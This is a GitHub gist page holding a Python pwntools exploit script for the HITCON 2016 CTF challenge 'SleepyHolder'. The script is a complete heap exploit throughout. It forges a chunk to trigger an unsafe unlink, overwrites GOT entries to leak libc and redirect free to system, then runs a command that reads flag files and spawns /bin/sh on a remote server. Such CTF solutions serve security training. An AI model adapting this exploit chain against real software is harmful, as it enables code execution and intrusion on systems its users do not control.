Skip to content

Instantly share code, notes, and snippets.

@andigena

andigena/sleepy.py

Created October 10, 2016 02:27
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save andigena/c7d9127d6dc5b1d62917348e58c77aa4 to your computer and use it in GitHub Desktop.
Save andigena/c7d9127d6dc5b1d62917348e58c77aa4 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sleepy.py
import os
os.environ['TERM'] = 'xterm-256color'
from pwn import *
context.update(arch='amd64')
cwd = '/media/SSD2/dev/hx/ctf/hitcon16/sleepy'
bin = os.path.join(cwd, 'SleepyHolder')
b = ELF(bin)
libc = ELF(os.path.join('/lib/x86_64-linux-gnu/libc.so.6'))
# TARGET = 'qira'
# TARGET = 'gdb'
# TARGET = 'naked'
TARGET = 'live'
breakpoints = [
#0x0000000000400E95
]
execute = [
# 'b malloc.c:4006',
# 'b malloc.c:2631',
# 'b malloc.c:2715',
# 'b malloc.c:2536',
# 'commands',
# 'set $rdi = 0xff8',
# 'ignore 1 555',
#'continue',
# 'end',
# 'b malloc_consolidate',
]
execute.extend(['b *' + hex(br) for br in breakpoints])
# execute.append('set follow-exec-mode same')
execute.append('continue')
execute = flat(map(lambda x: x + '\n', execute))
urandom = 0x1000 - 0x20 - 8
print execute
def conn():
if TARGET == 'gdb':
with open('/tmp/urandom', 'wb') as ur:
ur.write(p32(urandom))
env = os.environ.copy()
env['LD_PRELOAD'] = '/media/SSD2/virtual/shared/shit/preeny/x86_64-linux-gnu/dealarm.so'
r = process(bin, cwd=cwd, env=env, aslr=False)
gdb.attach(r, execute=execute)
elif TARGET == 'qira':
# Start with
# stdbuf -oO qira -s ./books_757b0a24b0193ec8989290ec6923dd1d
r = remote('127.0.0.1', 4000)
elif TARGET == 'naked':
r = remote('localhost', 24242)
else:
r = remote('52.68.31.117', 9547)
return r
t = {'small': '1', 'big': '2', 'huge': '3'}
def wipe(which):
p.sendlineafter('Renew secret\n', '2')
p.sendlineafter('Big secret\n', t[which])
# for the first time
def keep(which, what):
p.sendlineafter('Renew secret\n', '1')
p.sendlineafter('forever\n', t[which])
p.sendlineafter(': \n', what)
# laterz
def keep2(which, what):
p.sendlineafter('Renew secret\n', '1')
p.sendlineafter('Big secret\n', t[which])
p.sendafter(': \n', what)
def renew(which, what):
print p.sendlineafter('Renew secret\n', '3')
p.sendlineafter('Big secret\n', t[which])
p.sendlineafter(': \n', what)
def renew2(which, what):
p.sendlineafter('Renew secret\n', '3')
p.sendlineafter('Big secret\n', t[which])
p.sendafter(': \n', what)
p = conn()
keep('small', cyclic(8))
keep('big', cyclic(8, alphabet=string.ascii_uppercase))
wipe('small')
# pause()
keep('huge', cyclic(3, alphabet=string.ascii_uppercase))
wipe('small')
small_holder = 0x06020D0
pl = {
0: 0x0,
8: 0x21,
16: small_holder-24,
24: small_holder-16,
32: 0x20
}
keep2('small', fit(pl))
# corrupt small->fd through prev_unlink of big
wipe('big')
renew2('small', cyclic(8) + p64(b.got['free']) + p64(0) + p64(0x06020C0) + p64(0xffffffffffffffff))
system_local = 0x8380
renew2('big', p64(b.plt['puts']))
# renew2('big', p64(libc.symbols['system'])[:2])
renew2('small', p64(b.got['read']))
wipe('big')
resp = p.recvuntil('1.')
read = u64(resp.split()[0].ljust(8, '\0'))
print hex(read)
libc.base = read - libc.symbols['read']
print 'libc.base: ', hex(libc.base)
keep2('big', 'echo OK GOOGLE; cat fl*; cat home/*/fl*; /bin/sh\0')
pause()
renew2('small', p64(b.got['free']))
print 'using ', hex(libc.symbols['system'])
pause()
renew2('big', p64(libc.base + libc.symbols['system']))
wipe('big')
keep2('big', 'echo OK GOOGLE; cat fl*; cat home/*/fl*; /bin/sh\0')
wipe('big')
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment